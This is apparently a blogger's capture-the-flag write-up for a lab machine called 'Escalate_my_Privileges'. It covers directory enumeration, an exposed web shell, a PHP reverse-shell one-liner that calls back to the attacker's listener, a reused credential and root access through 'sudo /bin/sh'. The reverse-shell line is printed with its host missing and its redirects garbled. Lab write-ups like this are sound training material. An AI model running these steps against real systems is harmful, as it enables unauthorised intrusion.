Simon McCabe

WAPT. OSCP. OSWP. PGCert. BSc. Linux+. Security+.

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...Escalate_my_Privileges Writeup...


1. Enumeration

First, I ran dirb and it identified a few interesting directories to get me started.


I went to the phpbash.php file first, as this sounded the most interesting:


It turns out that there's a nice web-based shell we can use. Nice and secure, huh?!

I went over to pentest-monkey and used the php reverse shell to get a connection on my attacking VM.

php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>amp;3");'

As expected, I was running as apache. For some reason, every command I typed doubled-up, so id became iidd, but it still worked:


From here, I went into the /home directory, and saw a user called "armour". In the armour directory, there was a file called "Credentials.txt". Inside it said: "md5(rootroot1)".


Next I switched user to "armour" and used the md5 hash as the password. I was now "armour":


2. Privilege Escalation

I ran "sudo -l" and noticed that a few things seemed mis-configured!


I ran: "sudo /bin/sh" and I was now root:


I looked to see whether the root user had a flag, and it did:


And that was that. Nice basic box. Thanks Akanksha for the challenge!

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